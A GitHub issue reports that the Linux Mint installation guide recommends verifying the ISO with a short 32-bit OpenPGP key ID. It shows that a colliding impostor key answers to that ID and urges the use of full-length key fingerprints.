Security issue: deprecated 32-bit key ID is recommended for verification of the Linux Mint ISO #17
Description
I checked English and several other language guides and found out that OpenPGP 32-bit key ID is recommended as an alternative for verifying an ISO.
Linux Mint Installation Guide --> Verify your ISO image --> Authenticity check
If gpg complains about the key ID, try the following commands instead:
gpg --keyserver hkp://keyserver.ubuntu.com:80 --recv-key A25BAE09
gpg --list-key --with-fingerprint A25BAE09
Check the output of the last command, to make sure the fingerprint is 27DE B156 44C6 B3CF 3BD7 D291 300F 846B A25B AE09 (with or without spaces).
results in
pub rsa1024 2014-01-26 [C]
1828 C98D 1C52 E20C 95DF B632 6ABA 455A A25B AE09
uid [ unknown] Totally Legit Signing Key <[email protected]>
There are some users in the wild including Linux Mint forum which are not familiar enough with GnuPG to resolve a problem even if they see that signature is wrong. It is a well known issue and only full 64-bit identifiers should be used. See:
https://github.com/jwilk/stopgp32
https://seclists.org/oss-sec/2018/q3/174